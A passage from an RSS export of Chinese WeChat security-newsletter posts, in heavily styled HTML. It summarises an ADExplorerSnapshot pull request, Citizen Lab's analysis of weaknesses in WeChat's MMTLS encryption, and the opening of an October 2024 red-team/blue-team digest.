		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">重用代码：脚本的开发基于项目中已有的代码，通过调整和优化实现了新的功能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">功能性增强：脚本能够导出证书信息，并且解析了ACL等高级信息，增强了工具的功能性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">格式模仿：输出的文本文件格式模仿了certipy工具，可能为了保持用户的熟悉度和兼容性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">贡献与分享：作者希望这些脚本对社区有用，并通过GitHub的拉取请求机制与社区分享。</section></li></ul>
	<br/>
	<p>🏷️: ADExplorerSnapshot, Pull Request, 证书, 脚本, GPO转储</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x10
			 微信MMTLS加密协议安全性分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">The Citizen Lab 对 WeChat 的主要网络安全协议 MMTLS 进行了深入分析，发现了多个安全和隐私问题，并对 WeChat 的网络请求加密流程、MMTLS 的无线格式、加密过程以及业务层加密进行了详细的技术描述和分析。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微信加密协议漏洞：美国情报机构可能从中获益？</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微信网络加密协议存在安全漏洞</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp65YiaJTM93xticwjIAIp8S6yerVvO6WHAKBxMPRCyia0ezndAGzyuGCdhg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp65YiaJTM93xticwjIAIp8S6yerVvO6WHAKBxMPRCyia0ezndAGzyuGCdhg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848554528814588"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MMTLS 的安全问题：MMTLS 存在多个安全问题，如缺乏前向保密性、使用确定性 IV、以及业务层加密的漏洞，这些问题可能导致数据被破解。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开源组件的使用：WeChat 在其应用程序中使用了 OpenSSL 和 Tencent Mars 等开源组件，但在加密方面的自定义修改可能降低了安全性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">中国应用的加密趋势：中国应用程序往往偏好使用自研加密系统，而不是标准的加密协议，这可能会导致安全性和性能的问题。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">NewDNS 系统的潜在目的：WeChat 的 NewDNS 系统可能是为了绕过 DNS 劫持，但其安全性和隐私性尚未得到充分的分析和验证。</section></li></ul>
	<br/>
	<p>🏷️: WeChat, MMTLS, 加密协议, TLS, 安全分析</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.1101851851851852" width="300" data-w="1080" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=43f89946&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6Bm4fXCzU6olKNzHYshiaBjEWsnq6XWUSlPstTibs0f9jWibiaWd7nyDsYw%2F640%3Fwx_fmt%3Dpng"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487735">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=fece5028&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487735%26idx%3D1%26sn%3Dafde6aaf1957c1e157a357d42480bf9e%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 17 Oct 2024 17:00:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」1010 | 近期漏洞、红蓝工具</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487728&amp;idx=1&amp;sn=c5bab130b8939748b305e97018968ca2</link>
      <description>涵盖CUPS打印系统、恶意软件虚拟化、Exchange PowerShell等多领域漏洞，以及Active Directory检测、Zimbra邮件平台远程命令执行等关键威胁</description>
      <content:encoded><![CDATA[<p>
<span>red4blue</span> <span>2024-10-10 11:28</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>涵盖CUPS打印系统、恶意软件虚拟化、Exchange PowerShell等多领域漏洞，以及Active Directory检测、Zimbra邮件平台远程命令执行等关键威胁</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6b0ea35e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuKQJoSicGo0jUPBjEOzC9MBSot9qQgKmticVzgFPqprXYbUWZkibMwib7ng%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-10-10 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20241010</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 